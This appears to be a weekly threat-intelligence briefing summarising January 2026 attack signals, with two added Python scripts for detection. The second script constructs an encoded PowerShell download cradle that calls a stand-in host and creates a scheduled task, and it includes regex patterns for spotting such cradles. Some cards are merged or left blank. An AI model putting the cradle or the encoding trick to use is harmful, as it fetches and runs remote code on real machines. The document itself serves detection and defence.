Jan-2026 - Week 4

Weekly Threat Intel Briefing

Consolidated signals, vulnerabilities, IOCs, and detections for rapid operational action.

Total Signals: 27
Vulnerabilities: 2
IOCs: 19
Detections: 3

Analytics Snapshot

All available metrics from signals, vulnerabilities, IOCs, and detections.

Intel Category
Data Breach: 6
Malware: 5
Ransomware: 2
Unspecified: 2
APT: 1

Geography targeted
Unspecified: 8
USA: 2
Algeria: 1
Argentina; Afghanistan; Argentina, Japan, Australia, India: 1
Global, Latin America, Spain, Belgium, South Korea, US, Armenia, Israel: 1

Industry targeted
Unspecified: 7
Insurance: 2
Civil Society, Human Rights: 1
Communications: 1
Construction: 1

IOC types
File Name: 9
MD5: 5
Command Line: 2
Domain: 1
IP Address: 1

Weekly Signals

Executive summaries with attack context, business impact, and immediate actions.

How Hacked Construction Apps Are Bringing Down Jobsite Security
Type: Exploit | Severity: High | Likelihood: Moderate | Prevalence: Three incidents observed by Huntress in 2025
Published: January 21, 2026
Vertical-specific construction applications face unique risks. Hacked apps stem from flaws in the software or its components, expanding the jobsite attack surface.

Attack Profile

Surface: Web Application (Mjobtime)

Phases: Initial Access, Lateral Movement, Command Execution

MITRE: Initial Access, Execution, Persistence; T1190 (Exploit Public-Facing Application, here via blind SQL injection), T1059.001 (Command and Scripting Interpreter: PowerShell)

Actors and Tooling

Threat Actors: Unknown

Malware/Tools: MSSQL (sqlservr.exe) abused through xp_cmdshell for command execution

Campaign: Unknown

Business Impact

Why it matters: Construction companies often rely on specialized software for managing operations. Exploiting vulnerabilities in these applications can compromise critical data and systems.

Owner team: Not specified

Mitigation

Patch Mjobtime to version 15.7.3 or later. Harden the backing MSSQL instance: restrict network access to it, run the application's database login without sysadmin rights (xp_cmdshell needs sysadmin or an explicit proxy account), and disable xp_cmdshell.

Immediate Actions

Check for Mjobtime installations. Review IIS logs for suspicious POST requests to /Default.aspx/update_profile_Server. Verify xp_cmdshell is disabled on MSSQL instances.
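One way to carry out the IIS log review above, as an added example and not code from the briefing or from Huntress: a Python hunt over W3C-format IIS logs that picks out POST requests to /Default.aspx/update_profile_Server and scores each one by whether the caller was unauthenticated, used a non-browser user agent, or got a slow response, the signature of time-based blind SQL injection. The log lines, the 3-second threshold and the user-agent heuristic are assumptions for illustration.

```python
"""Hunt IIS W3C logs for POSTs to the Mjobtime endpoint named in the briefing.

Added example, not code from the briefing or from Huntress. The endpoint
path comes from the card above; the log lines, the slow-response threshold
and the user-agent heuristic are assumptions.
"""
from collections import defaultdict

# Constructed IIS W3C extended log excerpt (not real telemetry). IIS writes one
# space-separated record per request and declares the columns in a "#Fields:"
# directive; POST bodies are never logged, so the hunt keys on the URI, the
# response time and the caller rather than on the injected payload itself.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status time-taken
2026-01-18 03:12:07 10.0.0.5 GET /Default.aspx - 443 - 203.0.113.9 Mozilla/5.0+(Windows+NT+10.0) 200 31
2026-01-18 03:12:09 10.0.0.5 POST /Default.aspx/update_profile_Server - 443 - 203.0.113.9 python-requests/2.31.0 200 5042
2026-01-18 03:12:14 10.0.0.5 POST /Default.aspx/update_profile_Server - 443 - 203.0.113.9 python-requests/2.31.0 200 5039
2026-01-18 03:12:19 10.0.0.5 POST /Default.aspx/update_profile_Server - 443 - 203.0.113.9 python-requests/2.31.0 200 37
2026-01-18 08:44:01 10.0.0.5 POST /Default.aspx/update_profile_Server - 443 jsmith 192.168.1.20 Mozilla/5.0+(Windows+NT+10.0) 200 48
"""

TARGET_PATH = "/default.aspx/update_profile_server"  # endpoint from the briefing (compared case-insensitively)
SLOW_MS = 3000                                        # assumed threshold for time-based blind SQLi responses


def parse_w3c(text):
    """Yield one dict per record, keyed by the column names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def score_record(rec):
    """Return the reasons a POST to the target endpoint looks suspicious (empty if none)."""
    if rec["cs-method"] != "POST" or rec["cs-uri-stem"].lower() != TARGET_PATH:
        return []
    reasons = []
    if rec["cs-username"] == "-":
        reasons.append("unauthenticated caller")
    if int(rec["time-taken"]) >= SLOW_MS:
        reasons.append("slow response (time-based blind SQLi pattern)")
    if not rec["cs(User-Agent)"].startswith("Mozilla"):
        reasons.append("non-browser user agent")
    return reasons


def hunt(text):
    """Group flagged requests by client IP: {ip: [(timestamp, reasons), ...]}."""
    hits = defaultdict(list)
    for rec in parse_w3c(text):
        reasons = score_record(rec)
        if reasons:
            hits[rec["c-ip"]].append((f'{rec["date"]} {rec["time"]}', reasons))
    return dict(hits)


if __name__ == "__main__":
    for ip, events in hunt(SAMPLE_LOG).items():
        print(f"{ip}: {len(events)} suspicious POST(s)")
        for when, reasons in events:
            print(f"  {when}: {', '.join(reasons)}")
```

Pair this with the database-side check: on each MSSQL instance, `SELECT value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell'` should return 0, and any sqlservr.exe spawning cmd.exe in endpoint telemetry deserves investigation on its own.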

Tags: SQL Injection, Construction, Accounting Software, Mjobtime, FOUNDATION
Inside a Multi-Stage Windows Malware Campaign
Type: Malware | Severity: High | Likelihood: N/A | Prevalence: N/A
Published: January 20, 2026
FortiGuard Labs analysis of a multi-stage Windows malware campaign that abuses trusted platforms to disable defenses, deploy RATs, and deliver ransomware.

Attack Profile

Surface: User Execution of LNK files

Phases: Initial Infection, Payload Delivery, System Compromise

MITRE: Initial Access, Execution, Persistence, Defense Evasion, Collection, Command and Control; T1566.001 (Phishing: Spearphishing Attachment), T1204.002 (User Execution: Malicious File), T1027 (Obfuscated Files or Information), T1059.001 (Command and Scripting Interpreter: PowerShell), T1078 (Valid Accounts)

Actors and Tooling

Threat Actors: Unknown

Malware/Tools: Amnesia RAT, Defendnot (used to disable Microsoft Defender)

Campaign: N/A

Business Impact

Why it matters: Widespread file encryption, stolen data, abuse of Defendnot to disable Microsoft Defender.

Owner team: N/A

Mitigation

User education on phishing and social engineering; alerting on tampering with security controls (Defender being disabled, as Defendnot does); keeping Defender updated.

Immediate Actions

Review PowerShell execution policies, monitor for suspicious file activity.

Tags: Windows, PowerShell, Social Engineering, Ransomware, Defendnot, Defender Bypass
The Next Frontier of Runtime Assembly Attacks: Leveraging LLMs to Generate Phishing JavaScript in Real Time
Type: Malware | Severity: N/A | Likelihood: N/A | Prevalence: N/A
Published: January 22, 2026
We discuss a novel AI-augmented attack method where malicious webpages use LLM services to generate dynamic code in real time within a browser. Source: Unit 42.

Attack Profile

Surface: Web Browsers

Phases: Delivery, Execution

MITRE: Execution

Actors and Tooling

Threat Actors:

Malware/Tools: LogoKit

Campaign:

Business Impact

Why it matters: This technique allows attackers to evade network analysis, increase the diversity of malicious scripts, and tailor phishing campaigns.

Owner team:

Mitigation

Runtime behavioral analysis that can detect and block malicious activity at the point of execution within the browser.

Immediate Actions

Contact Unit 42 Incident Response if compromised.

Tags: API, DeepSeek, Google, JavaScript, LLM, Phishing
DNS OverDoS: Are Private Endpoints Too Private?
Type: DoS | Severity: N/A | Likelihood: N/A | Prevalence: Over 5% of Azure storage accounts are susceptible
Published: January 20, 2026
We've identified an aspect of Azure's Private Endpoint architecture that could expose Azure resources to denial of service (DoS) attacks. Source: Unit 42.

Attack Profile

Surface: Azure Private Link, DNS resolution

Phases: Reconnaissance, Denial of Service

MITRE: Denial of Service

Actors and Tooling

Threat Actors:

Malware/Tools:

Campaign:

Business Impact

Why it matters: Denial of service to storage accounts can cause Azure Functions to fail, and DoS to Key Vaults can disrupt dependent processes.

Owner team:

Mitigation

Microsoft's advice is to enable DNS "fallback to internet", so that names that do not resolve in the private DNS zone fall back to public resolution. Defenders should also scan their environments for susceptible resources.

Immediate Actions

Tags: Microsoft Azure, Networking
Foxit, Epic Games Store, MedDreams vulnerabilities
Severity: N/A | Likelihood: N/A | Prevalence: N/A
Cisco Talos' Vulnerability Discovery & Research team recently disclosed three vulnerabilities in Foxit PDF Editor, one in the Epic Games Store, and twenty-one in MedDream PACS. The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco's third-party vulnerability

Attack Profile

Surface:

Phases:

MITRE:

Actors and Tooling

Threat Actors:

Malware/Tools:

Campaign:

Business Impact

Why it matters:

Owner team:

Mitigation

Immediate Actions

Operation DupeHike : UNG0902 targets Russian employees with DUPERUNNER and AdaptixC2
Type: Malware Campaign | Severity: N/A | Likelihood: N/A | Prevalence: Recently uncovered (Nov 2025)
Published: Jan 20, 2026
SEQRITE APT-Team have recently uncovered a campaign, which has been targeting Russian […] The Seqrite post covers key targets, industries affected, geographical focus, the infection chain, the decoy document, a three-stage technical analysis (Stage 1: malicious LNK script; Stage 2: DUPERUNNER implant; Stage 3: AdaptixC2 beacon), infrastructure artefacts, IOCs and a MITRE ATT&CK mapping. Source: Seqrite.

Attack Profile

Surface: Email (Spear Phishing)

Phases: Initial Infection, Lateral Movement, Command and Control

MITRE: Initial Access, Execution, Command and Control T1566.001 (Phishing), T1204.002 (User Execution via Malicious File), T1059.001 (Command and Scripting Interpreter – PowerShell), T1047 (Windows Management Instrumentation)

Actors and Tooling

Threat Actors: UNG0902

Malware/Tools: DUPERUNNER, AdaptixC2, PowerShell

Campaign: Operation DupeHike

Business Impact

Why it matters: Targets critical departments (HR, payroll) within Russian organizations, potentially leading to data breaches and financial fraud.

Owner team:

Mitigation

Immediate Actions

Tags: APT, DUPERUNNER, AdaptixC2, Russia, HR, Payroll
Operation Covert Access: Weaponized LNK-Based Spear-Phishing Targeting Argentina’s Judicial Sector to Deploy a Covert RAT
Type: Malware | Severity: N/A | Likelihood: N/A | Prevalence: Globally Active
Published: Jan 19, 2026
Seqrite Labs has identified and uncovered a globally active spear-phishing campaign targeting Argentina's […] The Seqrite post covers the infection chain, targeted sectors, initial findings about the campaign, analysis of the decoy, and a three-stage technical analysis (Stage 1: the Windows shortcut (.LNK) file; Stage 2: the batch file; Stage 3: detailed analysis of the Covert RAT), followed by IOCs and a MITRE ATT&CK mapping. Source: Seqrite.

Attack Profile

Surface: Email

Phases: Initial Access, Execution, Persistence

MITRE: this card merges three signals (the Argentina judicial-sector campaign, a FALSECUB signal, and a North Korea-tagged PowerShell backdoor signal). Tactics: Initial Access, Execution, Persistence, Exfiltration, Command and Control. Techniques: T1566.001 (Phishing: Spearphishing Attachment), T1204.002 (User Execution: Malicious File), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell, for the batch stage), T1053.005 (Scheduled Task/Job: Scheduled Task), T1547.001 (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder)

Actors and Tooling

Threat Actors: Unknown; KONNI

Malware/Tools: Rust-based RAT, PowerShell, Batch scripts; FALSECUB; PowerShell Backdoor, OneDriveUpdater.exe

Campaign: Operation Covert Access

Business Impact

Why it matters: Targets sensitive legal and institutional data within the judicial sector.

Owner team:

Mitigation

Immediate Actions

Tags: spear-phishing, LNK, RAT, Argentina, Judicial Sector; APT, Spear-Phishing, FALSECUB; AI, PowerShell, Spear-Phishing, RAT, North Korea, Blockchain
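The three LNK-driven chains on this page (the FortiGuard multi-stage Windows campaign, Operation DupeHike and Operation Covert Access) all begin with a user opening a shortcut that spawns cmd.exe or PowerShell underneath explorer.exe. The following is an added example, not code from the briefing or from Fortinet or Seqrite: a Python triage over constructed Sysmon-style process-creation events that flags shells descending from explorer.exe with hidden-window, execution-policy-bypass or encoded-command flags, decodes the -EncodedCommand payload, and looks inside it for a download cradle or scheduled-task creation. The events, the example.invalid URL and the task name are assumptions.

```python
"""Triage process-creation events for LNK -> cmd/PowerShell chains.

Added example, not code from the briefing or from the vendors it cites. The
events are constructed in the shape of Sysmon Event ID 1 records (image,
command line, parent PID); the URL and task name in the encoded script are
invented for illustration.
"""
import base64
import re


def encode_ps(script):
    """Encode a script the way 'powershell -EncodedCommand' expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed stage-2 script hidden behind -enc: a download cradle plus scheduled-task persistence.
_STAGE2 = ("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1'); "
           "schtasks /create /sc minute /mo 5 /tn OneDriveUpdate /tr C:\\Users\\Public\\u.exe")
_ENC = encode_ps(_STAGE2)

# Constructed events. The first chain is what a double-clicked LNK produces:
# explorer.exe -> cmd.exe -> powershell.exe with a hidden window and an encoded command.
EVENTS = [
    {"pid": 4120, "ppid": 900, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 5210, "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": f'"C:\\Windows\\System32\\cmd.exe" /c start /min powershell -w hidden -ep bypass -enc {_ENC}'},
    {"pid": 5222, "ppid": 5210, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell -w hidden -ep bypass -enc {_ENC}"},
    # Benign control: an admin script with a visible window and no encoding.
    {"pid": 6001, "ppid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
EVASION_FLAGS = re.compile(
    r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}|-w(?:indowstyle)?\s+hidden|-ep\s+bypass", re.I)
CRADLE_OR_PERSIST = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bIEX\b|Invoke-Expression"
    r"|schtasks\s+/create|Register-ScheduledTask", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def ancestors(event, by_pid):
    """Image basenames of the parent chain, nearest parent first."""
    chain, parent = [], by_pid.get(event["ppid"])
    while parent is not None:
        chain.append(basename(parent["image"]))
        parent = by_pid.get(parent["ppid"])
    return chain


def triage(events):
    """Flag shells that descend from explorer.exe (a user double-click, e.g. on an LNK)
    and carry evasion flags or a download cradle / scheduled-task creation."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["image"]) not in SHELLS or "explorer.exe" not in ancestors(e, by_pid):
            continue
        reasons = []
        if EVASION_FLAGS.search(e["cmdline"]):
            reasons.append("hidden window / encoded command / execution-policy bypass")
        decoded = decode_encoded_command(e["cmdline"])
        if CRADLE_OR_PERSIST.search(e["cmdline"]) or (decoded and CRADLE_OR_PERSIST.search(decoded)):
            reasons.append("download cradle or scheduled-task persistence")
        if reasons:
            findings.append({"pid": e["pid"], "chain": [basename(e["image"])] + ancestors(e, by_pid),
                             "decoded": decoded, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f"pid {f['pid']}: {' <- '.join(f['chain'])}: {'; '.join(f['reasons'])}")
        if f["decoded"]:
            print("  decoded:", f["decoded"][:80])
```

On real telemetry, feed Sysmon Event ID 1 records (or Windows 4688 events with command-line auditing enabled) into triage(); the parent-chain check is what separates a shortcut-launched shell from scripts started by a service or a logon script, and the decoded payload is where the stage-2 URL and the persistence artefact show up.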
VoidLink: Evidence That the Era of Advanced AI-Generated Malware Has Begun
Type: Malware | Severity: N/A | Likelihood: N/A | Prevalence: N/A
Published: January 20, 2026
When we first encountered VoidLink, we were struck by its level of maturity, high functionality, efficient architecture, and flexible, dynamic operating model. Employing technologies like eBPF and LKM rootkits and dedicated modules for cloud enumeration and post-exploitation in container environments, this unusual piece of malware seemed to be a larger development effort […] Source: Check Point Research.

Attack Profile

Surface: Unknown

Phases: Unknown

MITRE:

Actors and Tooling

Threat Actors: Single individual

Malware/Tools: VoidLink, TRAE SOLO, TRAE

Campaign: VoidLink

Business Impact

Why it matters: Highlights the dangers of AI in malware development, normalizing high-complexity attacks previously associated with high-resource threat actors.

Owner team:

Mitigation

Immediate Actions

Tags: AI, ChatGPT, Malware, Threat Research, Artificial Intelligence
19th January – Threat Intelligence Report
Type: Malware, Data Breach, Cyberattack | Severity: Critical | Likelihood: High | Prevalence: High
Published: January 19, 2026
For the latest discoveries in cyber research for the week of 19th January, please download our Threat Intelligence Bulletin. Top attacks and breaches: Spanish energy company Endesa has disclosed a data breach after unauthorized access to a commercial platform used to manage customer information. Media report attackers listed over 1 terabyte of data, including IBANs, […] Source: Check Point Research.

Attack Profile

Surface: Customer data platforms, IT systems, servers, email platforms, third-party vendors, WordPress plugins, Bluetooth accessories, Microsoft Desktop Window Manager

Phases: Initial Access, Exploitation, Lateral Movement, Data Exfiltration

MITRE: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Command and Control, Impact; Spearphishing Attachment (T1566.001), Exploit Public-Facing Application (T1190), OS Credential Dumping (T1003), Data Encrypted for Impact (T1486)

Actors and Tooling

Threat Actors: Unknown, China-affiliated, Possibly Russian-linked (Sicarii ransomware)

Malware/Tools: Ransomware, Sicarii, VoidLink

Campaign: N/A

Business Impact

Why it matters: These attacks highlight the continued risk of data breaches, ransomware, and social engineering. The exploitation of vulnerabilities like CVE-2025-37164 and CVE-2026-20805 requires immediate attention. The wide range of targeted organizations demonstrates the broad threat landscape.

Owner team: N/A

Mitigation

Patch CVE-2025-37164, CVE-2026-20805 and CVE-2026-23550; implement strong security awareness training; strengthen third-party risk management; improve incident response capabilities.

Immediate Actions

Tags: Data Breach, Cyberattack, Ransomware, Phishing, Vulnerability Exploitation
Ransom & Dark Web Issues Week 3, January 2026
Type: Ransomware | Severity: N/A | Likelihood: N/A | Prevalence: N/A
Published: Jan 22 2026
ASEC Blog publishes Ransom & Dark Web Issues Week 3, January 2026. Headlines covered:
- Qilin Ransomware Targets Korean Specialist in Semiconductor/Display Components & Surface Treatment
- U.S. DOJ: Access Broker "r1z" Pleads Guilty
- Qilin Ransomware Targets Vietnam's National Airlines

Attack Profile

Surface: Endpoint, Networks

Phases:

MITRE:

Actors and Tooling

Threat Actors: Qilin Ransomware, r1z

Malware/Tools: Qilin Ransomware

Campaign:

Business Impact

Why it matters: Highlights ongoing ransomware activity, particularly targeting specific industries and geographic regions, and exposes access broker activity.

Owner team:

Mitigation

Subscribe to AhnLab TIP for IOCs and detailed analysis.

Immediate Actions

Tags: Airlines, Dark Web, Data Breach, Data Leak, Data Theft, DDW, Deep Web, Department of Justice, Display, Leaked, Personal Information Leak, Personal Information Theft, Qilin, Ransom, Ransomware, Semiconductor, South Korea, Surface Treatment, United States, USA, Vietnam
December 2025 Security Issues in Korean & Global Financial Sector
Type: Phishing/Scam | Severity: N/A | Likelihood: N/A | Prevalence: N/A
Published: Jan 21 2026
This report comprehensively covers real-world cyber threats and security issues that have occurred in the financial industry in Korea and worldwide. It includes an analysis of malware and phishing cases targeting the financial industry, a list of the top 10 malware strains targeting the industry, and statistics on the sectors of Korean accounts leaked on […]

Attack Profile

Surface: Networks, EndPoint

Phases:

MITRE:

Actors and Tooling

Threat Actors: INC Ransom, BreachLaboratory

Malware/Tools: INCRansom

Campaign:

Business Impact

Why it matters: Significant data breaches affecting major financial institutions pose a systemic risk to national financial systems and require proactive measures.

Owner team:

Mitigation

Immediate Actions

Tags: Dark Forums, Dark Web, Deep Web, Email, Financial Sector, INC Ransom, kazu, Monti, Phishing
Proxyware Disguised as Notepad++ Tool
Type: Malware | Severity: N/A | Likelihood: N/A | Prevalence: Increasing in South Korea
AhnLab SEcurity intelligence Center (ASEC) is monitoring Proxyjacking attacks and continuously disclosing distribution cases and IoCs identified in South Korea. The threat actor Larva-25012, known for deploying Proxyware, has recently begun using malware disguised as a Notepad++ installer. In addition, the attacker is actively changing techniques to evade detection, such as injecting Proxyware into the Windows Explorer […]

Attack Profile

Surface: Software Download Portals, Task Scheduler, DLL side-loading

Phases: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion

MITRE: Defense Evasion, Execution, Persistence; T1053.005 (Scheduled Task/Job: Scheduled Task), T1027 (Obfuscated Files or Information), T1202 (Indirect Command Execution)

Actors and Tooling

Threat Actors: Larva-25012

Malware/Tools: Proxyware (DigitalPulse, Honeygain, Infatica), DPLoader, Notepad++

Campaign:

Business Impact

Why it matters: Proxyware silently sells the victim's bandwidth through residential proxy networks, degrading performance and potentially exposing users to further attacks.

Owner team:

Mitigation

Immediate Actions

Tags: Proxyware, Notepad++, Larva-25012, Proxyjacking, DPLoader, Infatica, DigitalPulse
December 2025 APT Group Trends
Type: APT | Severity: N/A | Likelihood: N/A | Prevalence: N/A
Published: Jan 19 2026
Key APT Group Trends by Region 1) North Korea North Korean state‑sponsored threat groups have increasingly relied on fake IT employment schemes, actively exploiting legitimate hiring platforms and fabricated identities to infiltrate corporate environments. These actors frequently take advantage of remote‑work infrastructures to obtain elevated access and conduct long‑term social engineering operations […]

Attack Profile

Surface: Remote Work Infrastructure, Hiring Platforms

Phases: Initial Access, Exploitation, Persistence

MITRE: Initial Access; Phishing (T1566), Impersonation (T1656)

Actors and Tooling

Threat Actors: Famous Chollima

Malware/Tools: AnyDesk, Google Remote Desktop, Astrill VPN, Simplify Copilot, AIApply, Final Round AI

Campaign:

Business Impact

Why it matters: Highlights a growing trend of APT groups using fake job opportunities to gain access to critical systems and data.

Owner team:

Mitigation

Verify job applicants' identities, implement multi-factor authentication, monitor remote access activity, and educate employees about social engineering tactics.

Immediate Actions

Tags: APT, North Korea, Remote Work, Social Engineering, IT Employment
Critical Infrastructure Attacks Became Routine for Hacktivists in 2025
Type: Hacktivism | Severity: N/A | Likelihood: N/A | Prevalence: N/A
Hacktivists moved well beyond their traditional DDoS attacks and website defacements in 2025, increasingly targeting industrial control systems (ICS) and turning to ransomware, breaches, and data leaks, as their sophistication and alignment with nation-state interests grew. That was one of the conclusions in Cyble's 2025 Threat Landscape report, from which this blog was adapted. Looking ahead to 2026 and beyond, Cyble expects critical infrastructure attacks by hacktivists to continue to grow, increasing use of custom tools by hacktivists, and deepening alignment between nation-state interests and hacktivists.

ICS Attacks by Hacktivists Surge

Between December 2024 and December 2025, several hacktivist groups increased their focus on ICS and operational technology (OT) attacks. Z-Pentest was the most active actor, conducting repeated intrusions against a wide range of industrial technologies. Dark Engine (Infrastructure Destruction Squad) and Sector 16 persistently targeted ICS, primarily exposing Human Machine Interfaces (HMI). A secondary tier of groups, including Golden Falcon Team, NoName057(16), TwoNet, RipperSec, and Inteid, also claimed to have conducted recurrent ICS-disrupting attacks, albeit on a smaller scale.

HMI and web-based Supervisory Control and Data Acquisition (SCADA) interfaces were the most frequently targeted systems, followed by a limited number of Virtual Network Computing (VNC) compromises, which posed the greatest operational risk to several industries. Building Management System (BMS) platforms and Internet of Things (IoT) or edge-layer controllers were also targeted in increasing numbers, reflecting the broader exploitation of weakly secured IoT interfaces. Europe remained the primary region affected by pro-Russian hacktivist groups, with sustained targeting of Spain, Italy, the Czech Republic, France, Poland, and Ukraine contributing to the highest concentration of ICS-related intrusions.

The Intersection of State Interests and Hacktivism

State-aligned hacktivist activity remained persistent throughout 2025. Operation Eastwood (14–17 July) disrupted NoName057(16)'s DDoS infrastructure, prompting swift retaliatory attacks from the hacktivist group. The group rapidly rebuilt capacity and resumed operations against Ukraine, the EU, and NATO, underscoring the resilience of state-directed ecosystems. U.S. indictments and sanctions further exposed alleged structured cooperation between Russian intelligence services and pro-Kremlin hacktivist fronts. The Justice Department detailed GRU-backed financing and tasking of the Cyber Army of Russia Reborn (CARR), as well as the state-sanctioned development of NoName057(16)'s DDoSia platform. Z-Pentest, identified as part of the same CARR ecosystem and attributed to the GRU, continued targeting EU and NATO critical infrastructure, reinforcing the convergence of activist personas, state mandates, and operational doctrine.

Pro-Ukrainian hacktivist groups, though not formally state-directed, conducted sustained, destructive operations against networks linked to the Russian military. The BO Team and the Ukrainian Cyber Alliance conducted several data destruction and wiper attacks, encrypting key Russian businesses and state machinery. Ukrainian actors repeatedly stated that exfiltrated datasets were passed to national intelligence services. The hacktivist groups Cyber Partisans BY (Belarus) and Silent Crow claimed a year-long Tier-0 compromise of Aeroflot's IT environment, allegedly exfiltrating more than 20 TB of data, sabotaging thousands of servers, and disrupting core airline systems, a breach that Russia's General Prosecutor confirmed caused significant operational outages and flight cancellations.

Research into BQT.Lock (BaqiyatLock) suggests a plausible ideological alignment with Hezbollah, as evidenced by narrative framing and targeting posture; however, no verifiable technical evidence has confirmed a direct organizational link. Cyb3r Av3ngers, associated with the Islamic Revolutionary Guard Corps (IRGC), struck critical infrastructure assets, including electrical networks and water utilities in Israel, the United States, and Ireland. After being banned on Telegram, the group resurfaced under the alias Mr. Soul Team.

Tooling and capability development by hacktivist groups also grew significantly in 2025. Observed activities have included:
- Notable growth in custom tool creation (e.g., BQT Locker and associated utilities), including the adoption of ransomware as a hacktivist mechanism.
- Increasing use of AI-generated text and imagery for propaganda and for spreading misinformation and disinformation.
- Tool promotion and marketing emerging as a driver of hacktivism.

Hacktivist Sightings Surged 51% in 2025

In 2025, hacktivism evolved into a globally coordinated threat, closely tracking geopolitical flashpoints. Armed conflicts, elections, trade disputes, and diplomatic crises fueled intensified campaigns against state institutions and critical infrastructure, with hacktivist groups weaponizing cyber-insurgency to advance their propaganda agendas. Pro-Ukrainian, pro-Palestinian, pro-Iranian, and other nationalist groups launched ideologically driven campaigns tied to the Russia-Ukraine War, the Israel-Hamas conflict, Iran-Israel tensions, South Asian tensions, and the Thailand-Cambodia border crisis. Domestic political unrest in the Philippines and Nepal triggered sustained attacks on government institutions. Cyble recorded a 51% increase in hacktivist sightings in 2025, from 700,000 in 2024 to 1.06 million in 2025, with the bulk of activity focused on Asia and Europe (chart in the source report).

Pro-Russian state-aligned hacktivists and pro-Palestinian, anti-Israel collectives continued to be the primary drivers of hacktivist activity throughout 2025, shaping the operational tempo and geopolitical focus of the threat landscape. Alongside these dominant ecosystems, Cyble observed a marked increase in operations by Kurdish hacktivist groups and emerging Cambodian clusters, both of which conducted campaigns closely aligned with regional strategic interests. Major hacktivist groups of 2025: (table in the source report).

India, Ukraine, and Israel were the countries most impacted by hacktivist activity in 2025 (country breakdown in the source report). Among global regions targeted, Europe and NATO faced a sustained pro-Russian campaign marked by coordinated DDoS attacks, data leaks, and escalating ICS intrusions against NATO and EU member states. Government & LEA, Energy & Utilities, Manufacturing, and Transportation were consistent targets. In the Middle East, Israel remains the principal target amid the Gaza conflict-related escalation, Iran-Israel confrontation, and Yemen-Saudi hostilities. Saudi Arabia, UAE, Egypt, Jordan, Iraq, Syria, and Yemen faced sustained DDoS attacks, defacements, data leaks, and illicit access to exposed ICS assets from ideologically aligned coalitions operating across the region. In South Asia, India-Pakistan and India-Bangladesh tensions fueled high-volume, ideologically framed offensives, peaking around political flashpoints and militant incidents. Activity concentrated on Government & LEA, BFSI, Telecommunication, and Education. In Southeast Asia, border tensions and domestic unrest shaped a fragmented but active theatre: Thailand-Cambodia conflicts triggered reciprocal DDoS and defacements; Indonesia and Malaysia incidents stemmed from political and social disputes; the Philippines saw attacks linked to internal instability; and Taiwan emerged as a recurring target for pro-Russian actors. Major hacktivist campaigns of 2025: (table in the source report).

Most Impacted Industries and Sectors

2025 witnessed a marked expansion of hacktivist focus across multiple industries. Government & LEA, Energy & Utilities, Education, IT & ITES, Transportation & Logistics, and Manufacturing experienced the most pronounced growth in targeting, driving the year's overall increase in operational activity. The dataset also reveals a broadened attack surface, with several new or significantly expanded categories, including Agriculture & Livestock, Food & Beverages, Hospitality, Construction, Automotive, and Real Estate. Government & LEA was the most impacted sector by a wide margin, followed by Energy & Utilities (chart in the source report).

The Evolution of Hacktivism

Hacktivism has evolved into a geopolitically charged, ICS-focused threat, continuing to exploit exposed OT environments and increasingly weaponizing ransomware as a protest mechanism. In 2026, hacktivists and cybercriminals will increasingly target exposed HMI/SCADA systems and VNC takeovers, aided by public PoCs and automated scanning templates, creating ripple effects across the energy, water, transportation, and healthcare sectors. Hacktivists and state actors will increasingly employ financially motivated tactics and appearances. State actors in Iran, Russia, and North Korea will increasingly adopt RaaS platforms to fund operations and maintain plausible deniability. Critical infrastructure attacks in Taiwan, the Baltic states, and South Korea will appear financially motivated while serving geopolitical objectives, complicating attribution and response.

Recommendations: critical assets should be isolated from the Internet wherever possible, and OT and IT networks should be segmented and protected with Zero Trust access controls. Vulnerability management, along with network and endpoint monitoring and hardening, is another critical cybersecurity best practice. Source: Cyble.

Attack Profile

Surface:

Phases:

MITRE:

Actors and Tooling

Threat Actors: Hacktivists

Malware/Tools:

Campaign:

Business Impact

Why it matters:

Owner team:

Mitigation

Immediate Actions

Tags: Critical Infrastructure, Hacktivism, Cyber Attacks
CallOnDoc Telemedicine Platform Allegedly Breached, Exposing 1.14 Million Patient Records Including Medical Conditions
Type: Data Breach | Severity: Medium | Likelihood: N/A | Prevalence: Limited availability (5 buyers)
Published: January 22, 2026
CallOnDoc Telemedicine Platform Allegedly Breached, Exposing 1.14 Million Patient Records Including Medical Conditions

Attack Profile

Surface: Internal systems

Phases: Initial Access, Data Exfiltration

MITRE: Exfiltration

Actors and Tooling

Threat Actors: iProfessor; aming

Malware/Tools:

Campaign:

Business Impact

Why it matters: Exposure of sensitive patient medical information could lead to identity theft, fraud, and reputational damage.

Owner team:

Mitigation

Immediate Actions

Tags: data breach, telemedicine, patient records; Data Breach, Healthcare, China, Medical Data, Patient Records
